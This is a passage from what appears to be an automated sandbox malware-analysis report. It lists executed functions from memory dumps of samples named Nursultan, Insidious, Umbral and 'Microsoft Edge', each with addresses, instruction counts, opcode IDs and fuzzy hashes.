                                        • Instruction Fuzzy Hash: 61F02811F1DC890FF7A8B17C24AA2B953C2FBDDAA0F840136D00DD328ADD256C424245
                                        Function 00007FF848E609DD Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8fe8fc34ab43c25fd36dd46f2841489867b29013ec378b0beee7e7fed3ed01c
                                        • Instruction ID: c7b92645ae099e7f1bb598c3cf035c35c835af90f2c0de1975ba2be5cbb9aa23
                                        • Opcode Fuzzy Hash: c8fe8fc34ab43c25fd36dd46f2841489867b29013ec378b0beee7e7fed3ed01c
                                        • Instruction Fuzzy Hash: A5F081A1E0CB650FE344B63C58564793FD0FB94680F48046ED449D7192EE28E9404389

                                        Execution Graph

                                        Execution Coverage:14.2%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:3
                                        Total number of Limit Nodes:0
                                        execution_graph 11815 7ff848ea7300 11816 7ff848ea730f SendARP 11815->11816 11818 7ff848ea73e8 11816->11818

                                        Executed Functions

                                        Function 00007FF848EA7300 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2257702925.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff848e90000_Insidious.jbxd
                                        Similarity
                                        • API ID: Send
                                        • String ID:
                                        • API String ID: 121738739-0
                                        • Opcode ID: f82a148f91c231836c288e719a0e0aa8804de6d3c635c71c92eb5f56466d83ac
                                        • Instruction ID: 40d35f306e52b0f27f480c5f7ed7e599e9b67f60fa9e47f175de36d39c467cd8
                                        • Opcode Fuzzy Hash: f82a148f91c231836c288e719a0e0aa8804de6d3c635c71c92eb5f56466d83ac
                                        • Instruction Fuzzy Hash: D941F43090DB884FD719EB689C556A9BFF0FB56311F0442AFD089D7192CB346849CB92

                                        Executed Functions

                                        Function 00007FF848E70A21 Relevance: .4, Instructions: 401COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58e546f37947139edf19ae885e28413710dd22f4598edc7512758ad082f7bc38
                                        • Instruction ID: 21908bc88b62ad9f299c00c7f110c4c2438334cb0ca3b03c50d5990749816958
                                        • Opcode Fuzzy Hash: 58e546f37947139edf19ae885e28413710dd22f4598edc7512758ad082f7bc38
                                        • Instruction Fuzzy Hash: AED17030A1891D8FDB98FB68D498ABA73E2FF58351F144679E42AD32D2DF34AC518740
                                        Function 00007FF848E704B2 Relevance: 1.8, Strings: 1, Instructions: 518COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CN_^
                                        • API String ID: 0-3949952865
                                        • Opcode ID: 9fbf6a5f1ef4b2d1b2e4c92f821f3c7170ac786fe997d8c29e400043653aaafc
                                        • Instruction ID: 9145d15a5e1ad1e246eb97e833e45eef9ed4529035604c4a28afb016837ac5ce
                                        • Opcode Fuzzy Hash: 9fbf6a5f1ef4b2d1b2e4c92f821f3c7170ac786fe997d8c29e400043653aaafc
                                        • Instruction Fuzzy Hash: 6C41C761E0DAC29FF259B7B858191A9BBD0FF627A1F0C41BBC058470D3EF2968168395
                                        Function 00007FF848E704A8 Relevance: .3, Instructions: 332COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 970f701eceb54fab2fb61d0f2da6f2ed276b4248bf3ccff726b02056b2ea2c71
                                        • Instruction ID: efc49c04aa6dc6a80f73da2e404848ce28acc6e7c440eef0cca5ac28994f1d86
                                        • Opcode Fuzzy Hash: 970f701eceb54fab2fb61d0f2da6f2ed276b4248bf3ccff726b02056b2ea2c71
                                        • Instruction Fuzzy Hash: D7A1E261E1CA495FE798EB3C98593B9BBD2FF98790F080179D40ED3282DF38A8418755
                                        Function 00007FF848E71509 Relevance: .3, Instructions: 332COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e03b84f42f3f5077e067c7cca02b08e01b78026343ddb4a8dc31bdd6b6be88e
                                        • Instruction ID: 64f909257e596c2b490fa3ccc950f2d9dbeb9950e5c5e057606730aaeec9859e
                                        • Opcode Fuzzy Hash: 7e03b84f42f3f5077e067c7cca02b08e01b78026343ddb4a8dc31bdd6b6be88e
                                        • Instruction Fuzzy Hash: 92A1E261E1CA495FF798EB3C54993B9BBD2FB98790F08017AD40DC3282DF38A8418755
                                        Function 00007FF848E7109E Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b4c0514232fa00acf1af0d9ffeff0225002a15beb58c001bbbac070e9fde374
                                        • Instruction ID: 4644077aff73e23d8249159c6e05abcaec0c7692ca2d425f119ab95516b86dbc
                                        • Opcode Fuzzy Hash: 3b4c0514232fa00acf1af0d9ffeff0225002a15beb58c001bbbac070e9fde374
                                        • Instruction Fuzzy Hash: 48E06D02F1D8490BE698BAAC68992B863C2E7DD661B40513AD00DC338AED295C824641
                                        Function 00007FF848E709E6 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a813b6c27d69169afc5b8e4a89555b49665d55883754f01686b755b435edcd11
                                        • Instruction ID: 4253a0ce596fb49c2bc138c693739c639812e3b76a467dca545636027838acb4
                                        • Opcode Fuzzy Hash: a813b6c27d69169afc5b8e4a89555b49665d55883754f01686b755b435edcd11
                                        • Instruction Fuzzy Hash: 14E0CD10618D150BD7C8F5185441DBD77C1FB84394F480464F40DC3281DE289A8147C5

                                        Executed Functions

                                        Function 00007FF848E91719 Relevance: .7, Instructions: 696COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d3f5c68d521e927d7669ba7c0c1b4510848dd3362933ecde8c786b3fbd51db31
                                        • Instruction ID: 908c57bde6068225aaffa70607e175fbe3ad9018b704eabef95ba0a09952a7a1
                                        • Opcode Fuzzy Hash: d3f5c68d521e927d7669ba7c0c1b4510848dd3362933ecde8c786b3fbd51db31
                                        • Instruction Fuzzy Hash: 8222F121A2DE495FE798FB7884592B97BE2FF88384F440479D00EC32C6DF79A8418785
                                        Function 00007FF848E920F1 Relevance: .2, Instructions: 211COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d45f9f76ab951269ed8da6bc3908b401ed5d5b69cd0aaec036f88bf49de767fc
                                        • Instruction ID: db80c7c53e200950674c4bff8ad19782ce88d11a9a24ad10f69be75e631d25ee
                                        • Opcode Fuzzy Hash: d45f9f76ab951269ed8da6bc3908b401ed5d5b69cd0aaec036f88bf49de767fc
                                        • Instruction Fuzzy Hash: 11513220A1E6C95FDB86A7785864276BFE0EF87259F0800FBE08DC71D7EE580816C356
                                        Function 00007FF848E90AD3 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 9L_^
                                        • API String ID: 0-1679237627
                                        • Opcode ID: 64e0d66575bfbc530ac9366fefbc38d14ba41daeb5e7f858f02a7a49ab212eee
                                        • Instruction ID: adbfea01f9a4c2ce32aaa1f94c76337d94867293e6b9fee10f11fce1c5ddb5dc
                                        • Opcode Fuzzy Hash: 64e0d66575bfbc530ac9366fefbc38d14ba41daeb5e7f858f02a7a49ab212eee
                                        • Instruction Fuzzy Hash: DC612662A4991A6ED709B7BCE4011FC7BA0FF853A5F584576C00CC7193CF79A4868BE8
                                        Function 00007FF848E90E8E Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4L_^
                                        • API String ID: 0-2524838182
                                        • Opcode ID: 82cb7162820eb1854e594c7c7ef9f3dfe7670d8abe2c37a6a9f3b3be304ece89
                                        • Instruction ID: 648cebbe9431fe621d28b2dd3ed579033d7562c72ae2921de0202ccf29c17b56
                                        • Opcode Fuzzy Hash: 82cb7162820eb1854e594c7c7ef9f3dfe7670d8abe2c37a6a9f3b3be304ece89
                                        • Instruction Fuzzy Hash: 4D514621A0EA8A5FE396B77C98162B93FE1EF86660B0940FBD08CC7193DD1C5C428756
                                        Function 00007FF848E91295 Relevance: .9, Instructions: 863COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d96c352826e497ef5cbb64fa9311c65c043284a3f9be109934d920c9015ea4d
                                        • Instruction ID: c00e2b8be7eaab2d8cf428c9ed63e5896bb5271b23663179ab3e9a3825db7248
                                        • Opcode Fuzzy Hash: 7d96c352826e497ef5cbb64fa9311c65c043284a3f9be109934d920c9015ea4d
                                        • Instruction Fuzzy Hash: 6121A572D0DA995FE30AB7BCA8650F53BA0FF42295F0801B7C088CA1A3EE6D58068755
                                        Function 00007FF848E90985 Relevance: .3, Instructions: 339COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9ba86a89fab70b54e08849c1b5f2327ccedbde7857ec21a8794bd99dc6d274d
                                        • Instruction ID: 358b8c289f286c212d0dddc8eaa46e40f4ccf0df1df50bb1511c5624f50136f0
                                        • Opcode Fuzzy Hash: e9ba86a89fab70b54e08849c1b5f2327ccedbde7857ec21a8794bd99dc6d274d
                                        • Instruction Fuzzy Hash: 52A13766B489166ED709BBBCF8411F97B60FF863A1F484577C148CB193CA346086CBE5
                                        Function 00007FF848E909D3 Relevance: .3, Instructions: 313COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cecb5a7b08911878f2d5b61074948a28ed4fb5ba4a8654a6acb04a52d8d53a33
                                        • Instruction ID: d95db14d4e2e920f7877c5391b935b56cac647e8491e984aa3b78b78ca40bf95
                                        • Opcode Fuzzy Hash: cecb5a7b08911878f2d5b61074948a28ed4fb5ba4a8654a6acb04a52d8d53a33
                                        • Instruction Fuzzy Hash: 08913666B489166ED708BBBCF4051F97B60FF853B5F484577C148CB193CA25A086CBE4
                                        Function 00007FF848E90A08 Relevance: .3, Instructions: 297COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 289d34a66f3ea03842efde066976bba5b4800885278afef03b002426bf4df719
                                        • Instruction ID: ccaa2cd5de578e1836b8fac7a3151c823b97ea7756bd6e29b3fa9da2443bfee0
                                        • Opcode Fuzzy Hash: 289d34a66f3ea03842efde066976bba5b4800885278afef03b002426bf4df719
                                        • Instruction Fuzzy Hash: 95814766B489166ED709BBBCF4011FD7BA0FF853A1F584576C048C7193CA356086CBE4
                                        Function 00007FF848E90A10 Relevance: .3, Instructions: 294COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 582700667e51b6a25738f15554695dbf8716a55e4f33d870691c4d38bd31f439
                                        • Instruction ID: 6cfc23439abd82734584ff39a818805a56bdde13c806ff55ee74d39ea013cd63
                                        • Opcode Fuzzy Hash: 582700667e51b6a25738f15554695dbf8716a55e4f33d870691c4d38bd31f439
                                        • Instruction Fuzzy Hash: FA813666B489166ED708BBBCF4061F97BA0FF853A5F588576C148C7193CA346086CBE4
                                        Function 00007FF848E90A48 Relevance: .3, Instructions: 263COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e191c20f7e4703d74075a496568b593489735467715166fe2ee106cccca9b51
                                        • Instruction ID: 9a1b748f76f0d1c70a4b14f1021ecbb1233d4a07bf6c63a3c614a3d97ce03ba1
                                        • Opcode Fuzzy Hash: 8e191c20f7e4703d74075a496568b593489735467715166fe2ee106cccca9b51
                                        • Instruction Fuzzy Hash: 2A714766B4991A6ED709BBBCF4061FD7BA0FF853A1F584576C048C7193CA34A086CBE4
                                        Function 00007FF848E90638 Relevance: .1, Instructions: 138COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f38b76ee1c0e0b7129307b8c80d3242ff5dcfe58b834189817efab918b10535
                                        • Instruction ID: abbe05a84df541388be8f63c81578384ee982e37e8c8cbb4140475ddaac01e21
                                        • Opcode Fuzzy Hash: 1f38b76ee1c0e0b7129307b8c80d3242ff5dcfe58b834189817efab918b10535
                                        • Instruction Fuzzy Hash: 8C31F220B1D9495FE798EB2C985A379B6C2EB98795F0401BAE00EC32D7DE689C428345
                                        Function 00007FF848E90D21 Relevance: .1, Instructions: 128COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d3e5dc596d9279b3637bcafe375749c609e118182319f4e626d8b8c6afb53f9
                                        • Instruction ID: 384f643060c456c5fc0c452a28e32eafbf04cd6baf4af799fa7dc3f855ae7ce0
                                        • Opcode Fuzzy Hash: 8d3e5dc596d9279b3637bcafe375749c609e118182319f4e626d8b8c6afb53f9
                                        • Instruction Fuzzy Hash: 07310461F1CD095FE788B7BC581A3BDB6D2FF98751F044176E00DC3282DE2868418791
                                        Function 00007FF848E90BD3 Relevance: .1, Instructions: 121COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6578ad969199897e291dc378d603f9bd4eafea27b94632fd53b0a49f463774eb
                                        • Instruction ID: e6bc31ab033128b40fde6fc6d699f2f1b12c096ee1f188b148a0c5d2e3e8f7e3
                                        • Opcode Fuzzy Hash: 6578ad969199897e291dc378d603f9bd4eafea27b94632fd53b0a49f463774eb
                                        • Instruction Fuzzy Hash: A441D371A1DA4E9FDB48FBB894552EDBBB1FF89300F540475D009D3286DE38A8418B94
                                        Function 00007FF848E90858 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09a2cd36a36c950550406fde5644bcb2e3d0d0c617ed6450cb4bc3a4dd91a674
                                        • Instruction ID: 0eeea2835a65bf48ad79c6db0ab1ec1cdd536512a11900d0bf7aec7883c6cce4
                                        • Opcode Fuzzy Hash: 09a2cd36a36c950550406fde5644bcb2e3d0d0c617ed6450cb4bc3a4dd91a674
                                        • Instruction Fuzzy Hash: 7C310921A5AA495FD358F76890A81FA3FB1FF85204F8444F5D409C738BDE24A880CB9C
                                        Function 00007FF848E90870 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b7bf6d33fcdc3e1b5b76893c06ba2204dfe03c0d912fac558ac99cea7f7aee0
                                        • Instruction ID: 2ef94960603d223cd3a1fe8682c2a6f76a23e2308bb426f5b8eade9e9d102495
                                        • Opcode Fuzzy Hash: 6b7bf6d33fcdc3e1b5b76893c06ba2204dfe03c0d912fac558ac99cea7f7aee0
                                        • Instruction Fuzzy Hash: EC21B631A5AA495FD358FB6890A95FA7FB1FF85200F8448F5D409C338BDE34A880C799
                                        Function 00007FF848E922C1 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68a77b1a471deea4787f4b87f9926f5d0a0991d492a036233ae6d9a990e124af
                                        • Instruction ID: 2a7259a77e51b1b5ecd9d4adb93c6e75ff803c50d5fc319563c93ae8ceb948b9
                                        • Opcode Fuzzy Hash: 68a77b1a471deea4787f4b87f9926f5d0a0991d492a036233ae6d9a990e124af
                                        • Instruction Fuzzy Hash: EF01492190DBC10FEB85B33818154757FF0EF92284F0804BBD89CC7097D968A984838A

                                        Executed Functions

                                        Function 00007FF848E8B72D Relevance: 4.6, Strings: 2, Instructions: 2084COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: _$;P
                                        • API String ID: 0-2701581389
                                        • Opcode ID: bbf9a6909c71e19de1bac3250129c825e396365ba18a0384d965078fa82c3bcb
                                        • Instruction ID: 03b950e881200dd20259dcc119b0c152d882b9833d288c7b5745fc5ef950b48b
                                        • Opcode Fuzzy Hash: bbf9a6909c71e19de1bac3250129c825e396365ba18a0384d965078fa82c3bcb
                                        • Instruction Fuzzy Hash: B8F24D70A1CB868FD7A9EB18C495AAA73E1FFA9340F10457DD48DC7292DF34A841CB46
                                        Function 00007FF848E8A720 Relevance: 3.0, Strings: 2, Instructions: 477COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 1$m
                                        • API String ID: 0-402893558
                                        • Opcode ID: 32e96aa9c10efe7fdb08cbb7a39f9abb4325befa402ebf2f0af0b94e35a784e9
                                        • Instruction ID: e9c7f1658b6773bae0e99923f56b25a938dddc8894f53b521b4bd16fd622ebf0
                                        • Opcode Fuzzy Hash: 32e96aa9c10efe7fdb08cbb7a39f9abb4325befa402ebf2f0af0b94e35a784e9
                                        • Instruction Fuzzy Hash: 43029D70E0CA499FE799EF2884557A9BBE1FF58344F1441FAE44ED3282CF3969818B05
                                        Function 00007FF848EC8A40 Relevance: 2.0, Strings: 1, Instructions: 714COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: H_^
                                        • API String ID: 0-808990722
                                        • Opcode ID: 75b2c76f0d2bf6199b762cb7f7553acaef59b827e8e6b82c8bf6ab106c69c296
                                        • Instruction ID: f79f25863708cf6c06912d088e0e2a3c817fe7db0e639df1ad252f2e1691204a
                                        • Opcode Fuzzy Hash: 75b2c76f0d2bf6199b762cb7f7553acaef59b827e8e6b82c8bf6ab106c69c296
                                        • Instruction Fuzzy Hash: DF224530A0CB854FE74AEB2898616657BE1FF56340F1841FBD48AC7193DE38AC46C396
                                        Function 00007FF848E8B938 Relevance: 1.3, Instructions: 1340COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab9774e60ec2f5d4213d918eeb27605593b5186832d2aa3cc4a363e081609fe9
                                        • Instruction ID: e88b66407deddce54fd627cb1994a62c87d4d540a5434117d0a923a07cd0a2ec
                                        • Opcode Fuzzy Hash: ab9774e60ec2f5d4213d918eeb27605593b5186832d2aa3cc4a363e081609fe9
                                        • Instruction Fuzzy Hash: 0AA22170A1CA4A8FD7A9EB18C495BAA77E1FFA8340F10457DD08DC7292DF35A881CB45
                                        Function 00007FF848E7DFC6 Relevance: 1.0, Instructions: 1017COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89f5e4c28dbe9d1dae03a43367e57db699ccf1bbd66c78536b418f78ee276536
                                        • Instruction ID: 7eccfa07d132f684c6b8e18dbd1ab722817f5c2c2aff5110f7fcdc54f941a5d9
                                        • Opcode Fuzzy Hash: 89f5e4c28dbe9d1dae03a43367e57db699ccf1bbd66c78536b418f78ee276536
                                        • Instruction Fuzzy Hash: 4072B230A0DE4E8FE788EB6CC4506A5B7E1FF5A740F6442A9E409CB2D2CE35AC41C755
                                        Function 00007FF848E77228 Relevance: 1.0, Instructions: 1010COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fdd048f9b9cc84111524a3ea4fce0483cfdc67b3fcaaa2acb0b965bc942e08b9
                                        • Instruction ID: 1049a26364ef5b84a347204febe6580143d5c9dec7b19b12bdfa87c59a939c00
                                        • Opcode Fuzzy Hash: fdd048f9b9cc84111524a3ea4fce0483cfdc67b3fcaaa2acb0b965bc942e08b9
                                        • Instruction Fuzzy Hash: A772A131A18A4E8FEB98FF28C450AAA73E1FF99340F5445A9D41DC7296DF35E842CB50
                                        Function 00007FF848E8B910 Relevance: .9, Instructions: 930COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e80674c22f776233dca967986628f08e380ee3885f10325bac793507b648bcfc
                                        • Instruction ID: b47b94c1b4692a6ea97a62599aa6ae0b8fbdee53e2c405f5f21008e3f1b575d2
                                        • Opcode Fuzzy Hash: e80674c22f776233dca967986628f08e380ee3885f10325bac793507b648bcfc
                                        • Instruction Fuzzy Hash: 0A52AE71E0CE4A9FEB99FA28905567573D2FF98380F1441BDD04EC7286DF38A8428789
                                        Function 00007FF848E8B5F9 Relevance: .8, Instructions: 792COMMON
                                        Download Yara Rule
                                        Memory Dump Source
